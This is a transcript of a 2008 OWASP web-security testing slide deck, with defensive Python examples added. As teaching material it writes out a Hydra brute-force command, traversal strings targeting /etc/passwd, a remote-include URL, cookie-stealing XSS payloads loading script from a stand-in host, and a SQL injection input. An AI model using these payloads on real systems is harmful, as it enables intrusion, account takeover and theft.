romulus owasp
DESCRIPTION
Romulus project OWASP presentation. More info at: http://www.ict-romulus.eu/
TRANSCRIPT
OWASP OVERVIEW
Alberto Pastor Nieto, Informática Gesfor
March 2008
OWASP
- The Open Web Application Security Project
- OWASP Top Ten
- OWASP Testing Guide (Tools demonstration)
OWASP
- Open community
- Interested in improving application security
- Not affiliated with any technology company
OWASP TOP TEN (2007)
1. Cross Site Scripting (XSS)
2. Injection Flaws
3. Malicious File Execution
4. Insecure Direct Object Reference
5. Cross Site Request Forgery (CSRF)
6. Information Leakage and Improper Error Handling
7. Broken Authentication and Session Management
8. Insecure Cryptographic Storage
9. Insecure Communications
10. Failure to Restrict URL Access
Information Gathering
- Testing Web Application Fingerprint
- Application Discovery
- Spidering and Googling
- SSL/TLS Testing
- Testing for File Extensions Handling
- Application Configuration Management Testing
- Old, Backup and Unreferenced Files
Information Gathering: Testing Web Application Fingerprint
- Different servers
- Different versions
- Different responses
Information Gathering: Testing Web Application Fingerprint
$ nc 202.41.76.251 80
HEAD / HTTP/1.0

HTTP/1.1 200 OK
Date: Mon, 16 Jun 2003 02:53:29 GMT
Server: Apache/1.3.3 (Unix) (Red Hat/Linux)
Last-Modified: Wed, 07 Oct 1998 11:18:14 GMT
ETag: "1813-49b-361b4df6"
Accept-Ranges: bytes
Content-Length: 1179
Connection: close
Content-Type: text/html
Information Gathering: Testing Web Application Fingerprint
Tools:
- Netcraft (http://www.netcraft.com)
- httprint (http://www.net-square.com/httprint/)
Information Gathering: Application Discovery
Related issues:
- Different base URL
- Non-standard ports
- Virtual hosts
Information Gathering: Application Discovery
Different base URL:
- Directory exploration?
- Google (site:www.example.com)
- Candidate URLs (e.g. Nessus)
Information Gathering: Application Discovery
Non-standard ports:
nmap -P0 -sT -sV -p1-65535 192.168.1.100
Interesting ports on 192.168.1.100:
(The 65527 ports scanned but not shown below are in state: closed)
PORT    STATE SERVICE VERSION
22/tcp  open  ssh     OpenSSH 3.5p1 (protocol 1.99)
80/tcp  open  http    Apache httpd 2.0.40 ((Red Hat Linux))
443/tcp open  ssl     OpenSSL
901/tcp open  http    Samba SWAT administration server
Information Gathering: Application Discovery
Virtual hosts:
$ host -t ns www.owasp.org
www.owasp.org is an alias for owasp.org.
owasp.org name server ns1.secure.net.
owasp.org name server ns2.secure.net.
http://searchdns.netcraft.com/?host
Information Gathering: Spidering and Googling
Spidering:
wget -r http://www.example.com
Googling:
googlegath.pl (http://www.nothink.org/perl/googlegath/)
Information Gathering: SSL/TLS Testing
Vulnerability scanners:
- Expired certificates
- Weak ciphers
- ...
Other tools: OpenSSL, SSLDigger
Information Gathering: Testing for File Extensions Handling
Identify underlying technologies
Tools:
- wget
- curl
- web mirroring tools
- vulnerability scanners
Information Gathering: Application Configuration Management Testing
- Typical files and known directories
- Be careful with HTML comments
- Customize error pages
- Only load the necessary modules
- Minimise privileges
- Log access (successful and failed)
Information Gathering: Old, Backup and Unreferenced Files
- Site map and technology clues
- Content clues
Practices:
- Look into robots.txt and sitemap files
- Public information (cache:, site:)
- Search for files: ~, .old, .bak, ...
Information Gathering: Old, Backup and Unreferenced Files
- Do not use mod_autoindex and mod_info (hide unnecessary information)
- Correct permissions
- Use chroot
- Follow logging recommendations
Business Logic Testing
- Automated tools find it hard to understand context
- Needs people who know the business logic
- Strong data testing
Authentication: Obtain User Accounts
- Dictionary attacks
- Brute-force attacks
- Pattern searching attacks
Authentication: Obtain User Accounts
Tools:
- John the Ripper
- Hydra
- Brutus
- Rainbow Tables
Authentication: Obtain User Accounts
raven@blackbox /hydra $ ./hydra -L users.txt -P words.txt www.site.com https-post-form "/index.cgi:login&name=^USER^&password=^PASS^&login=Login:Not allowed" &
Hydra v5.3 (c) 2006 by van Hauser / THC - use allowed only for legal purposes.
Hydra (http://www.thc.org) starting at 2009-07-04 19:16:17
[DATA] 16 tasks, 1 servers, 1638 login tries (l:2/p:819), ~102 tries per task
[DATA] attacking service http-post-form on port 443
[STATUS] attack finished for wiki.intranet (waiting for childs to finish)
[443] host: 10.0.0.1 login: owasp password: password
[STATUS] attack finished for www.site.com (waiting for childs to finish)
Hydra (http://www.thc.org) finished at 2009-07-04 19:18:34
Authentication: Bypassing the Authentication Schema
- Direct page request
- Parameter modification
- Session ID prediction
- SQL injection
Authentication: Bypassing the Authentication Schema
Tools:
- WebScarab
- WebGoat (training)
Authentication: Directory Traversal / File Include
Known as "dot-dot-slash"
Two evaluation steps:
- Input vectors enumeration
- Testing techniques
Authentication: Directory Traversal / File Include
Input vectors enumeration:
- HTTP GET and POST requests
- File uploads
- HTML forms
- ...
Authentication: Directory Traversal / File Include
Testing techniques:
http://example.com/getUserProfile.jsp?item=../../../../etc/passwd
Cookie: USER=1826cc8f:PSTYLE=../../../../etc/passwd
http://example.com/index.php?file=http://www.owasp.org/malicioustxt
CAREFUL WITH CHARSET!!
%2e%2e%2f is ../
%2e%2e/ is ../
..%2f is ../
%2e%2e%5c is ..\
%2e%2e\ is ..\
..%5c is ..\
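An added defensive check for the traversal variants listed above (example code, not part of the slides): it URL-decodes the request value the way a server would, including double encoding, treats the backslash forms like ../, rejects remote-include URLs, and refuses any path that resolves outside an assumed document root BASE_DIR.

```python
import posixpath
from urllib.parse import unquote

BASE_DIR = "/srv/app/profiles"   # assumed document root for the example

def fully_unquote(value: str, rounds: int = 3) -> str:
    """URL-decode repeatedly so double-encoded %252e%252e%252f is caught as well."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def resolve_safely(user_value: str, base_dir: str = BASE_DIR):
    """Return the absolute path inside base_dir, or None when the value is rejected."""
    decoded = fully_unquote(user_value)
    if "\x00" in decoded:                       # NUL truncates paths in C-based runtimes
        return None
    if decoded.lower().startswith(("http://", "https://", "ftp://")):
        return None                             # remote file include (?file=http://...)
    decoded = decoded.replace("\\", "/")        # ..%5c and ..\ behave like ../
    # Lexical normalisation of ./ and ../ segments, then anchor under base_dir.
    # (Lexical only: symlinks inside base_dir would need os.path.realpath as well.)
    candidate = posixpath.normpath(posixpath.join(base_dir, decoded.lstrip("/")))
    if candidate != base_dir and not candidate.startswith(base_dir + "/"):
        return None
    return candidate

# Constructed inputs: two legitimate values plus the encodings from the slide.
EXPECTED = {
    "alice.html": "/srv/app/profiles/alice.html",
    "sub/./bob.html": "/srv/app/profiles/sub/bob.html",
    "../../../../etc/passwd": None,
    "%2e%2e%2f%2e%2e%2fetc/passwd": None,
    "..%2f..%2fetc/passwd": None,
    "%2e%2e%5c%2e%2e%5cetc/passwd": None,
    "%252e%252e%252fetc/passwd": None,          # double-encoded
    "http://www.owasp.org/malicioustxt": None,
}

def check_samples() -> dict:
    """Map each sample to what resolve_safely() returns for it."""
    return {value: resolve_safely(value) for value in EXPECTED}
```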
Authentication: Directory Traversal / File Include
Tools:
- WebScarab
- Paros
- Burp Suite
Authentication: Vulnerable Remember Password and Password Reset
"Security questions":
- Multiple questions
- Strong questions
- Limit the number of attempts
- CAPTCHA
- Send to email
Authentication: Vulnerable Remember Password and Password Reset
Careful with "Remember password":
<INPUT TYPE="password" AUTOCOMPLETE="off">
If the password is stored in a cookie, store it in hashed form.
Session Management: Logout and Browser Cache Management Testing
End of web session:
- The user logs out
- The user remains idle for a certain amount of time and the application automatically logs him/her out
Session Management: Logout and Browser Cache Management Testing
KEY: INVALIDATE THE SERVER-SIDE SESSION
Java: HttpSession.invalidate()
Session Management: Logout and Browser Cache Management Testing
Other practices:
- Make the end-session button clearly visible
- Invalidate cookies on the client side
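A framework-neutral Python sketch of the logout practices above (added example, not code from the slides; the Java equivalent of the key step is HttpSession.invalidate()): the server-side record is dropped first, the client cookie is expired, cache headers keep authenticated pages out of the browser cache, and an assumed idle timeout IDLE_TIMEOUT logs the user out automatically.

```python
import secrets
import time

IDLE_TIMEOUT = 15 * 60   # seconds of inactivity before automatic logout (assumed value)

class SessionStore:
    """In-memory server-side session store; the clock is injectable for testing."""
    def __init__(self, clock=time.time):
        self._sessions = {}   # session id -> {"user": ..., "last_seen": ...}
        self._clock = clock

    def create(self, user: str) -> str:
        sid = secrets.token_urlsafe(32)          # 256-bit random session id
        self._sessions[sid] = {"user": user, "last_seen": self._clock()}
        return sid

    def user_for(self, sid):
        """Return the user of a live session, or None (idle sessions are purged)."""
        rec = self._sessions.get(sid)
        if rec is None:
            return None
        if self._clock() - rec["last_seen"] > IDLE_TIMEOUT:
            del self._sessions[sid]               # idle timeout is a server-side logout too
            return None
        rec["last_seen"] = self._clock()
        return rec["user"]

    def logout(self, sid) -> dict:
        """Drop the server-side record and return headers for the logout response."""
        self._sessions.pop(sid, None)             # the key step: invalidate server-side
        return {
            # Expire the client cookie as well (a complement, not a substitute)
            "Set-Cookie": "SESSIONID=deleted; Path=/; Max-Age=0; HttpOnly; Secure",
            # Keep authenticated pages out of browser and proxy caches
            "Cache-Control": "no-store, no-cache, must-revalidate",
            "Pragma": "no-cache",
            "Expires": "0",
        }

def demo() -> tuple:
    """Login, logout, replay of the old id, and an idle timeout, on a fake clock."""
    now = [1000.0]
    store = SessionStore(clock=lambda: now[0])
    sid = store.create("alice")
    before = store.user_for(sid)                  # "alice"
    store.logout(sid)
    after_logout = store.user_for(sid)            # None: a replayed cookie is rejected
    sid2 = store.create("bob")
    now[0] += IDLE_TIMEOUT + 1
    after_idle = store.user_for(sid2)             # None: idle timeout
    return before, after_logout, after_idle
```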
Session Management: Logout and Browser Cache Management Testing
Tools:
- WebScarab
- Add N Edit Cookies (Firefox extension)
- Web Developer (Firefox extension)
Session Management: Analysis of the Session Management Schema
Session token analysis, steps to follow:
- Randomness
- Uniqueness
- Resistance to statistical analysis
- Resistance to cryptographic analysis
Session Management: Cookie and Session Token Manipulation
Steps:
- Cookie collection
- Cookie reverse engineering
- Cookie manipulation
Tools:
- WebScarab
- CookieDigger
Session Management: Cross Site Request Forgery (CSRF)
Cross-Site Request Forgery (CSRF) describes a way to force an unknowing user to execute unwanted actions on a web application in which he is currently authenticated.
Recommended practices:
- Add session-related information in URLs
- Use POST
- Intermediate pages ("Are you sure you really want to do this?")
- Use REFERER headers
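The first, second and fourth practices above combined in one check (added example, not from the slides): a random per-session token that every state-changing POST must carry, verified in constant time, plus a same-site Referer test against an assumed host SITE_HOST. Requests are plain dicts standing in for parsed HTTP requests, constructed for the example.

```python
import hmac
import secrets
from urllib.parse import urlsplit

SITE_HOST = "www.example.com"     # assumed host of the protected application

def issue_csrf_token(session: dict) -> str:
    """Create one random token per session and keep it server-side."""
    if "csrf_token" not in session:
        session["csrf_token"] = secrets.token_hex(32)
    return session["csrf_token"]

def referer_ok(headers: dict) -> bool:
    """Accept only same-site HTTPS Referers; a missing Referer counts as foreign."""
    ref = headers.get("Referer")
    if not ref:
        return False
    parts = urlsplit(ref)
    return parts.scheme == "https" and parts.hostname == SITE_HOST

def csrf_check(request: dict, session: dict) -> bool:
    """True only for a POST that carries this session's token from a same-site page."""
    if request["method"] != "POST":            # state changes go over POST (slide)
        return False
    expected = session.get("csrf_token")
    supplied = request.get("form", {}).get("csrf_token", "")
    if not expected or not supplied:
        return False
    # constant-time comparison so the token cannot be guessed byte by byte
    token_ok = hmac.compare_digest(expected.encode(), supplied.encode())
    return token_ok and referer_ok(request["headers"])

def demo() -> dict:
    """Constructed requests: legitimate, cross-site form, wrong token, GET link."""
    session = {"user": "alice"}
    token = issue_csrf_token(session)
    good = {"method": "POST", "headers": {"Referer": "https://www.example.com/transfer"},
            "form": {"amount": "100", "csrf_token": token}}
    foreign = {"method": "POST", "headers": {"Referer": "https://other-site.example/"},
               "form": {"amount": "100"}}         # no token, foreign Referer
    wrong = {"method": "POST", "headers": {"Referer": "https://www.example.com/"},
             "form": {"amount": "100", "csrf_token": "0" * 64}}
    link = {"method": "GET", "headers": {"Referer": "https://www.example.com/"},
            "form": {"amount": "100", "csrf_token": token}}
    return {"good": csrf_check(good, session), "foreign": csrf_check(foreign, session),
            "wrong_token": csrf_check(wrong, session), "get": csrf_check(link, session)}
```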
Data Validation: XSS (Cross Site Scripting)
XSS: code injection attacks into the various interpreters in the browser.
http://server/cgi-bin/testcgi.exe?<SCRIPT>alert("Cookie"+document.cookie)</SCRIPT>
<script src=http://www.example.com/malicious-code.js></script>
%3cscript src=http://www.example.com/malicious-code.js%3e%3c/script%3e
\x3cscript src=http://www.example.com/malicious-code.js\x3e\x3c/script\x3e
Revise all input vectors
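Why revising input vectors is necessary but not sufficient, shown with the three deliveries of the same payload listed above (added example, not from the slides): a blocklist on the raw parameter misses the URL-encoded and \x3c-escaped forms that the server later decodes, while output encoding at the point where the value is written into the page neutralises all three. The payload strings are constructed copies of the slide's examples.

```python
import html
import json
from urllib.parse import unquote

# The three deliveries of the same payload from the slide (constructed copies).
PAYLOADS = [
    "<script src=http://www.example.com/malicious-code.js></script>",
    "%3cscript src=http://www.example.com/malicious-code.js%3e%3c/script%3e",
    "\\x3cscript src=http://www.example.com/malicious-code.js\\x3e\\x3c/script\\x3e",
]

def blocklist_rejects(raw: str) -> bool:
    """Naive input filter: looks for the literal tag in the raw parameter."""
    return "<script" in raw.lower()

def server_decodes(raw: str) -> str:
    """The value after URL decoding and JS-style unescaping, i.e. what reaches the page."""
    decoded = unquote(raw)
    return decoded.encode("ascii").decode("unicode_escape")   # turns \x3c into <

def encode_for_html_body(value: str) -> str:
    """Output encoding for an HTML text context: < > & " ' become entities."""
    return html.escape(value, quote=True)

def encode_for_js_string(value: str) -> str:
    """Output encoding for a JavaScript string literal inside <script>; the extra
    replaces stop an embedded </script> from closing the block."""
    return json.dumps(value).replace("<", "\\u003c").replace(">", "\\u003e")

def evaluate() -> list:
    """Per delivery: does the filter catch it, does a tag survive decoding,
    and is the decoded value inert once output-encoded for each context?"""
    results = []
    for raw in PAYLOADS:
        decoded = server_decodes(raw)
        results.append({
            "filter_caught": blocklist_rejects(raw),
            "tag_after_decode": "<script" in decoded.lower(),
            "html_safe": "<" not in encode_for_html_body(decoded),
            "js_safe": "<" not in encode_for_js_string(decoded),
        })
    return results
```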
Data Validation: XSS (Cross Site Scripting)
Tools:
- OWASP CAL9000
Data Validation: SQL Injection
Insertion or "injection" of an SQL query via the input data from the client to the application.
Example:
SELECT * FROM Users WHERE Username='$username' AND Password='$password'
Input:
$username = 1' or '1' = '1
$password = 1' or '1' = '1
Result:
SELECT * FROM Users WHERE Username='1' OR '1' = '1' AND Password='1' OR '1' = '1'
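The query above run both ways against an in-memory SQLite table with constructed rows (added example, not from the slides): the string-concatenated form returns every user for the input 1' or '1' = '1, because the OR makes the WHERE clause always true, while the parameterised form treats the same input as a literal username and returns nothing.

```python
import sqlite3

def setup() -> sqlite3.Connection:
    """Constructed Users table with two rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Users (Username TEXT, Password TEXT)")
    conn.executemany("INSERT INTO Users VALUES (?, ?)",
                     [("alice", "s3cret"), ("bob", "hunter2")])
    return conn

def login_concat(conn, username: str, password: str) -> list:
    """Vulnerable: user input is pasted into the SQL text, exactly as on the slide."""
    sql = (f"SELECT * FROM Users WHERE Username='{username}' "
           f"AND Password='{password}'")
    return conn.execute(sql).fetchall()

def login_param(conn, username: str, password: str) -> list:
    """Fixed: placeholders keep the input as data, never as SQL syntax."""
    sql = "SELECT * FROM Users WHERE Username=? AND Password=?"
    return conn.execute(sql, (username, password)).fetchall()

def demo() -> dict:
    """Row counts for the slide's input against both implementations."""
    conn = setup()
    payload = "1' or '1' = '1"          # the input from the slide
    return {
        "concat_rows": len(login_concat(conn, payload, payload)),   # 2: every user
        "param_rows": len(login_param(conn, payload, payload)),     # 0: no such user
        "legit_rows": len(login_param(conn, "alice", "s3cret")),    # 1: real login
    }
```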
Data Validation: SQL Injection
Tools:
- OWASP SQLiX
- SQL Dumper
Data Validation: Other Injections
- LDAP Injection (Lightweight Directory Access Protocol)
- ORM Injection (Hibernate in Java, NHibernate in .NET, ActiveRecord in Ruby on Rails)
- XML Injection
- SSI Injection
- XPath Injection
- IMAP/SMTP Injection
- System command Injection
Data Validation: Buffer Overflow
Issues caused by buffer overflows:
- Denial of service (DoS)
- Code injection
- Code execution
Practices:
- Update software
- Follow best practices
Denial of Service
- User accounts blocked (use CAPTCHAs)
- Buffer overflows
- User-specified object allocation
- User input as a loop counter
- User-provided data written to disk
- Failure to release resources
- Storing too much data in the session
Web Services
- XML structural testing: overloading the XML parser
- XML content-level testing: XML/SQL/XPath... injections
- Validate input size
- Naughty SOAP attachments testing
- Man-in-the-middle testing
AJAX Testing
- Increased attack surface with many more inputs to secure
- Exposed internal functions of the application
- Client access to third-party resources with no built-in security and encoding mechanisms
- Failure to protect authentication information and sessions
- Blurred line between client-side and server-side code, resulting in security mistakes
Useful Tools
- OWASP Enterprise Security API
- OWASP Encoding (user input validation)
- OWASP Stinger (HTTP request validation)
- OWASP CSRFTester Project
Any questions?
OWASP: http://www.owasp.org
Romulus Project: http://www.ict-romulus.org